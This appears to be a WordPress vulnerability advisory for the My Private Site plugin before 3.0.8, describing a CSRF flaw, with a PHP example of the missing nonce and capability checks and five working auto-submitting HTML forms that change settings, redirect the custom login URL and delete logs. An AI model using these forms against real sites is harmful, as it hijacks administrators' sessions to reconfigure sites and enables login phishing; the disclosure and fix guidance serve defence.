WordPress Plugin Vulnerabilities

My Private Site < 3.0.8 - Arbitrary Settings Update via CSRF

Description

The plugin handles its settings tabs through admin-post.php actions (the my_private_site_tab_* actions used in the Proof of Concept below) without verifying a nonce, so it cannot distinguish a request submitted from its own settings page from one auto-submitted by a third-party page. An attacker who gets a logged-in administrator to open a crafted page can therefore change any of the plugin's settings without the administrator's knowledge, for example enabling the custom login option and pointing its URL at an attacker-chosen host, changing the landing page, turning on the membership options, or deleting the plugin's log. Versions before 3.0.8 are affected.
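The pattern behind this class of bug, as an added illustration and not the plugin's own source: an admin-post.php handler that honours any POST carrying the right action value, next to the hardened version that checks capability and nonce, and the settings form that emits the matching nonce. The hook name follows WordPress's admin_post_{action} convention for the action value seen in the PoC; the option names reuse the PoC field names, the handler and function names are made up here, and the nonce action string is our own choice. All of those are assumptions.

```php
<?php
/*
 * Added illustration, not the My Private Site plugin's code.
 * Assumptions: the hook name follows WordPress' admin_post_{action}
 * convention for the action value in the PoC, the PoC field names are
 * reused as option names, and the nonce action string is chosen here.
 */

/*
 * Vulnerable pattern: any POST reaching admin-post.php with
 * action=my_private_site_tab_advanced is honoured, so a form on an
 * attacker's page, auto-submitted in an administrator's browser, changes
 * the settings with the administrator's cookies.
 */
function mps_vuln_save_advanced() {
    if ( isset( $_POST['jr_ps_button_advanced_save'] ) ) {
        update_option( 'jr_ps_admin_advanced_url', esc_url_raw( wp_unslash( $_POST['jr_ps_admin_advanced_url'] ?? '' ) ) );
        update_option( 'jr_ps_admin_advanced_enable_custom_login', ! empty( $_POST['jr_ps_admin_advanced_enable_custom_login'] ) );
    }
    wp_safe_redirect( admin_url( 'admin.php?page=my_private_site' ) );
    exit;
}
// Left unhooked on purpose; shown only for contrast with the fixed handler.
// add_action( 'admin_post_my_private_site_tab_advanced', 'mps_vuln_save_advanced' );

/*
 * Hardened pattern: a capability check (authorisation) plus nonce
 * verification (request provenance). check_admin_referer() stops with an
 * "expired link" error page when _wpnonce is missing or stale, which is
 * exactly the state of the PoC forms.
 */
function mps_fixed_save_advanced() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'my-private-site' ), 403 );
    }
    // Verifies $_POST['_wpnonce'] against the action string used by the form.
    check_admin_referer( 'my_private_site_tab_advanced', '_wpnonce' );

    if ( isset( $_POST['jr_ps_button_advanced_save'] ) ) {
        $url = esc_url_raw( wp_unslash( $_POST['jr_ps_admin_advanced_url'] ?? '' ) );
        update_option( 'jr_ps_admin_advanced_url', $url );
        update_option( 'jr_ps_admin_advanced_enable_custom_login', ! empty( $_POST['jr_ps_admin_advanced_enable_custom_login'] ) );
    }
    wp_safe_redirect( add_query_arg( 'updated', '1', admin_url( 'admin.php?page=my_private_site' ) ) );
    exit;
}
add_action( 'admin_post_my_private_site_tab_advanced', 'mps_fixed_save_advanced' );

/*
 * The settings form must emit the matching nonce. wp_nonce_field() writes
 * the hidden _wpnonce and _wp_http_referer inputs; the nonce is bound to the
 * logged-in user and session, and a cross-origin page cannot read it.
 */
function mps_render_advanced_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="my_private_site_tab_advanced">
        <?php wp_nonce_field( 'my_private_site_tab_advanced', '_wpnonce' ); ?>
        <label>
            <input type="checkbox" name="jr_ps_admin_advanced_enable_custom_login"
                   <?php checked( get_option( 'jr_ps_admin_advanced_enable_custom_login' ) ); ?>>
            Enable custom login page
        </label>
        <input type="url" name="jr_ps_admin_advanced_url"
               value="<?php echo esc_attr( get_option( 'jr_ps_admin_advanced_url', '' ) ); ?>">
        <input type="submit" name="jr_ps_button_advanced_save" value="Save Advanced Options">
    </form>
    <?php
}
```

The capability check is not optional: the admin_post_{action} hook (as opposed to admin_post_nopriv_{action}) only requires that the requester be logged in, and being logged in is neither authorisation to change settings nor proof that the request came from the plugin's own page. Every settings tab handler needs the same pair of checks, and each form needs its own wp_nonce_field() call.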

Proof of Concept

Each form below is a separate attacker-hosted page; the script auto-submits it to the target's admin-post.php as soon as a logged-in administrator loads it, and the browser attaches the administrator's session cookies. Replace example.com with the target site. None of the forms carries a nonce field, which is precisely the request a CSRF check rejects.

<!-- Site Privacy tab: overwrite the compatibility mode setting -->
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="my_private_site_tab_site_privacy">
    <input type="text" name="jr_ps_admin_advanced_compatibility_mode" value="STANDARD">
    <input type="text" name="jr_ps_button_site_privacy_save" value="Save Privacy Status">
</form>
<script>
    document.getElementById("test").submit();
</script>


<!-- Landing Page tab: point the landing page at an attacker-chosen URL -->
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="my_private_site_tab_landing_page">
    <input type="text" name="jr_ps_admin_landing_page_option" value="url">
    <input type="text" name="jr_ps_admin_landing_page_url" value="https://example.com/whatever">
    <input type="text" name="jr_ps_button_landing_page_save" value="Save Landing Page">
</form>
<script>
    document.getElementById("test").submit();
</script>


<!-- Membership tab: turn on the register and reveal options -->
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="my_private_site_tab_membership">
    <input type="text" name="jr_ps_admin_membership_register" value="on">
    <input type="text" name="jr_ps_admin_membership_reveal" value="on">
    <input type="text" name="jr_ps_button_membership_save" value="Update Options">
</form>
<script>
    document.getElementById("test").submit();
</script>


<!-- Advanced tab: enable the custom login page and set its URL to an external host -->
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="my_private_site_tab_advanced">
    <input type="text" name="jr_ps_admin_advanced_enable_custom_login" value="on">
    <input type="text" name="jr_ps_admin_advanced_url" value="https://example.com.google.com">
    <input type="text" name="jr_ps_admin_advanced_password_reset_url" value="">
    <input type="text" name="jr_ps_button_advanced_save" value="Save Advanced Options">
    <input type="text" name="my_private_site_system_information" value="The log is empty.">
</form>
<script>
    document.getElementById("test").submit();
</script>


<!-- Advanced tab: delete the plugin's log (same action, different submit button) -->
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="action" value="my_private_site_tab_advanced">
    <input type="text" name="jr_ps_admin_advanced_url" value="">
    <input type="text" name="jr_ps_admin_advanced_password_reset_url" value="">
    <input type="text" name="my_private_site_system_information" value="The log is empty.">
    <input type="text" name="jr_ps_button_settings_logs_delete" value="Delete Log">
</form>
<script>
    document.getElementById("test").submit();
</script>

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Verified
Yes

Timeline

Publicly Published
2022-06-01
Added
2022-06-01
Last Updated
2023-03-01
